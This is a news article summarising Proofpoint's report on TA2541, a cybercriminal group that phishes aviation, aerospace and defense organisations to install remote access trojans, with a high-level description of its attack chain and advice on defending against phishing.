Dubbed TA2541 by Proofpoint researchers, the group has been attacking targets in several critical industries since 2017 with phishing emails and cloud-hosted malware droppers.
Security researchers at Proofpoint have announced their discovery of a common threat actor behind attacks reported by Cisco Talos, Microsoft and others, and they say that the group has been active since at least 2017.
Dubbed TA2541, Proofpoint said the individual or group has been mostly attempting to infect targets in the aviation, aerospace, transportation and defense industries with remote access trojans (RATs).
“Typically, its malware campaigns include hundreds to thousands of messages. … Campaigns impact hundreds of organizations globally, with recurring targets in North America, Europe and the Middle East. Messages are nearly always in English,” the report said.
SEE: Password breach: Why pop culture and passwords don’t mix (free PDF) (TechRepublic)
Proofpoint noted that, even though TA2541 uses commodity malware able to be purchased on the Dark Web or copied from open-source sites, it shows little variation in its campaigns. Other threat actors that use commodity malware, Proofpoint said, tend to use current events, news items and other hot topics to lure targets.
Because it uses massive volumes, commodity malware and has considerable command-and-control infrastructure, Proofpoint said it believes TA2541 “is a cybercriminal threat actor,” and not just a small-time operation.
How TA2541 attacks its targets
Aside from a brief adoption of COVID-19 themed phishing emails, TA2541 has maintained a steady course of targeting organizations through emails requesting quotes for aeronautical parts, ambulatory flights and other specific targets. Even its COVID messages maintained the aerospace theme, with one message featured in the report looking for a quote for a PPE shipment.
Files containing malicious scripts that download malware are a common technique, and Proofpoint said that TA2541 has used that method in past campaigns. More recent campaigns, Proofpoint said, have been using URLs that reach out to a Google Drive file with an obfuscated VBS file.
That file, in turn, makes PowerShell pull an executable from a text file hosted on sites like Pastebin, which in turn uses PowerShell to get into Windows processes, collects information and attempts to disable security software, and then downloads the RAT itself.
In addition to using public cloud services like Google Drive and OneDrive, TA 2541 has also been spotted using Discord URLs that link to compressed files that download one of two commodity malwares: AgentTesla, or Imminent Monitor.
TA 2541 is able to make itself persistent by adding scheduled tasks and registry entries, and despite using a variety of commodity malware, Proofpoint said its attack chain is always the same. The end result is similar as well: TA2541 gets the ability to remotely control infected machines.
How to avoid becoming a TA2541 victim
One of the more concerning things about TA2541 campaigns is that they cast an incredibly wide net that Proofpoint said doesn’t appear to target people with specific roles and functions. This means anyone in the thousands of organizations it has targeted could be an ingress point.
“Proofpoint assesses with high confidence this threat actor will continue using the same tactics, techniques and procedures observed in historic activity with minimal change to its lure themes, delivery and installation,” the report said.
SEE: Google Chrome: Security and UI tips you need to know (TechRepublic Premium)
Like other campaigns launched via phishing attacks, TA2541’s methods require a human to make a mistake. The best way to combat those sorts of mistakes is by training people to recognize suspicious emails and messages, as well as having proper anti-phishing security tools in place that can step in when mistakes inevitably occur.
Included in Proofpoint’s report are C2, VBS hash and ET signature indicators of compromise that security teams should be sure their systems are able to detect.